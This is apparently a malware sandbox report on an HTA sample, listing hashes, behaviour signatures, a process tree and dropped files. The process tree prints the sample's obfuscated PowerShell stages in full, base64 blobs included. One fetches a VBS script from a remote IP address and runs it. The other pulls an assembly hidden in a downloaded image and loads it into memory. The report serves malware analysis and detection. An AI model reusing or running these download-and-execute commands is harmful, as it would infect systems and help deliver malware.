Analysis

  • max time kernel
    16s
  • max time network
    21s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    05-02-2025 03:45

General

  • Target

    56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b.hta

  • Size

    14KB

  • MD5

    24a0a0feeb3c8ddf4e0a8480107d5a47

  • SHA1

    826364c4e1b951b3cb5d0c5d82db4a8e59e05140

  • SHA256

    56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b

  • SHA512

    2c318b518bf94a264dfc6ae8938a00b7f915a38f7105b4c7df7799fd242b9906e4147644f26b5f2ecdcf892f5186efcd9c5182ef1e8f155b460a24d7ba5cac3e

  • SSDEEP

    48:3aodOOQvMUUdOOQHnMUvMxyhz+rntkpyr+slA6Y8TurdkGijmQdkrC3dOOQe0dO1:qoOMhQM1AhmtscdlRB/arEY/PMfW+

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:640
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C PoWeRSHelL.exE -EX BYPAsS -nOp -W 1 -c dEVICeCREdEnTIAlDeplOymEnT.Exe ; inVoKe-ExprEsSion($(INVOKe-exPrESSiON('[sYSTEM.Text.EncOdINg]'+[chAr]58+[CHAR]0X3A+'UTF8.GetsTRIng([SYSTem.cONVErt]'+[CHAr]0x3a+[CHaR]0X3a+'FroMbAsE64sTRING('+[ChAr]0X22+'JDdCUEZBRDBaMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJkZUZJbklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZrcU16UmNQTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVVl6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreVhyTGRULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmYSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieENOZGVoTGkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckV4SEljZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3QlBGQUQwWjA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMjMuMTg3LjE1MC94YW1wcC9mYm4vbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZnUuZ0lGIiwiJEVOdjpBUFBEQVRBXG5pY2V0b21lZXR5b3VsaXR0bGVoZWFydHN3ZWV0aGVhcnRzaGVpc2JlYXV0aWYudmJzIiwwLDApO1NUQVJULXNMRWVQKDMpO0ludk9LRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZi52YnMi'+[CHAR]0x22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2244
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWeRSHelL.exE -EX BYPAsS -nOp -W 1 -c dEVICeCREdEnTIAlDeplOymEnT.Exe ; inVoKe-ExprEsSion($(INVOKe-exPrESSiON('[sYSTEM.Text.EncOdINg]'+[chAr]58+[CHAR]0X3A+'UTF8.GetsTRIng([SYSTem.cONVErt]'+[CHAr]0x3a+[CHaR]0X3a+'FroMbAsE64sTRING('+[ChAr]0X22+'JDdCUEZBRDBaMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJkZUZJbklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZrcU16UmNQTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVVl6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreVhyTGRULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmYSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieENOZGVoTGkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckV4SEljZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3QlBGQUQwWjA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMjMuMTg3LjE1MC94YW1wcC9mYm4vbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZnUuZ0lGIiwiJEVOdjpBUFBEQVRBXG5pY2V0b21lZXR5b3VsaXR0bGVoZWFydHN3ZWV0aGVhcnRzaGVpc2JlYXV0aWYudmJzIiwwLDApO1NUQVJULXNMRWVQKDMpO0ludk9LRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZi52YnMi'+[CHAR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2752
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xr-pnnas.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2760
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE570.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE56F.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2196
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicetomeetyoulittleheartsweetheartsheisbeautif.vbs"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2292
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAHIAbwBmAG4AZQBlAHMAcgBlAHYAZQByAG8AZgBsAHIAaQBnAGwAdQBmAGkAdAB1AGEAZQBiAGwAcgBpAGcAdABzAGUAYgBsAHIAaQBnAGUAYwBpAG4ALwBuAGIAZgAvAHAAcABtAGEAeAAvADAANQAxAC4ANwA4ADEALgAzADIALgA4ADkAMQAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMwAzADQANQAzADMALwBhAGwAYwBiADQAaAB0AG8AbAB6AHYAZgBoAHoAegB1AGYAcQBoADUALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAGEAcwBwAG4AZQB0AF8AYwBvAG0AcABpAGwAZQByACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2260

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabF9DB.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESE570.tmp

    Filesize

    1KB

    MD5

    9b351c1f469407734d0eba968a4770dc

    SHA1

    3e8a50fcd2661def32e1d3f0a86f4022d4d3dcb3

    SHA256

    901c0121d8378817c735dd7079f5ca7f605496e7ccb172e6caa800f4ccb8a31c

    SHA512

    447a286f769770172621c2d7badfe6c2ec6b6cf9c4d9329f6b12c5ff9ae84c2e1b9b65330867b01e7453353a2f8218a83571c11054db712204006311a5808dd3

  • C:\Users\Admin\AppData\Local\Temp\TarF9FD.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\xr-pnnas.dll

    Filesize

    3KB

    MD5

    a64615e2f283f46aecbcd44aef88eaef

    SHA1

    9ec808a048e8d0a664b541687e433fed82c12f11

    SHA256

    b6aeb88d9bf562cfdcf90f0110c185b5646a9bb5288e50d6c1356f9567df6225

    SHA512

    dbafa1e4cf50825054007adf614d69f6e262a0bbf9ad36c718c202792873b67b402a895e2e6436e75d1a431b4345fa0c8146048c1a40c9b3dc36d55f5142f812

  • C:\Users\Admin\AppData\Local\Temp\xr-pnnas.pdb

    Filesize

    7KB

    MD5

    307e70aecc4973f63961daadd571e007

    SHA1

    718d325def915896c46f3d9cb719a2e5d90222da

    SHA256

    5e44f6b88e893e1b6e34e4ec23eef7328e9354a9062c4ea7117d9207655dfd17

    SHA512

    3edb0cec3b43d744f9444a7c8883f165f71712784e256ea12a31af1a2b7ecd8207c7cc07be9d0f2b8ad72a7490df2ebff72c902f41ce7bc31da922bdbb4efaea

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    52ae7fb53b477127a603a0fa78c20f75

    SHA1

    04f045701c3c7199bb679b4c2e590252f5265b3d

    SHA256

    7973abfd7595d139e4e6e81400b1cc52f863d05f1c96ee469c4a797323a9e83f

    SHA512

    1b088177e408183515d39c1f4bb3bb5bd9bc444fd9759a40f11979990ad08edae2c078f512bfc8e6fab5cde1e3f4f3c5c1126ad6f455db27b386915b2ed64b29

  • C:\Users\Admin\AppData\Roaming\nicetomeetyoulittleheartsweetheartsheisbeautif.vbs

    Filesize

    216KB

    MD5

    eaaecea977e9d02eb3ba12a426b9930d

    SHA1

    1b1d388b1aace23874ab95ad625f1e34ee43e234

    SHA256

    5b8920b32beba0b9c5cadf86e0e48d3df9cf33b89ed878efc06ca07ba7122f18

    SHA512

    929d244152855e99319f46f0f7d022fa127d4f628afebd26b6597e8c10265ba75eb9f1150dc0346ef51719f331f62a13669a8a366d2689996788b0d2601121e8

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCE56F.tmp

    Filesize

    652B

    MD5

    ae70e05ac66b7ee65a50ec9764f15a65

    SHA1

    5b23193e425ed19cacf3489e68673b6738011442

    SHA256

    7f4efb225a1c951e4d9b52ffe17da97416bcccd896f393cbe6a1888b646b480c

    SHA512

    54d1d13e0fc44c181e99b2617094943d7dc430af259fd06aefe801cd308be18b6ce2eb77f374eddfc21417f29090dc77a61c1a1a47faab06da8ca62f7ca55b80

  • \??\c:\Users\Admin\AppData\Local\Temp\xr-pnnas.0.cs

    Filesize

    478B

    MD5

    19c349f194ea440d75e3d8bb016a48c1

    SHA1

    e4c63d11e4345744be72671c3f698ba717fca329

    SHA256

    54d8a84d51dffcb3b93aa8c8571f35fcf1c6a567574a138f9b803479b6aad974

    SHA512

    c9cc5ac32184f5771a22e8ff0de1812d4e4e0e1a8236d8660be761382983eeced98333ff6845c70ab999c52a94d64939e50d24cc4b3caab4d80c79e5267dfb71

  • \??\c:\Users\Admin\AppData\Local\Temp\xr-pnnas.cmdline

    Filesize

    309B

    MD5

    24a1d6a474bad29eab9c1223e2075f0d

    SHA1

    4b9417fa62f02b0d5fef3dcd1ca47e7c01dad8c7

    SHA256

    543e9e5d2fa30db5b869574e20b7f012521bb0ec7fb8cea368776586d97d7ee2

    SHA512

    e33f1868758c3f0bbccee38bca87066d0d462b1d093f05ce37e7a3b8c63e465cdbfe3a28977742259501bfd836f230a5dd1592ff11e8f0efa978f51298e9431c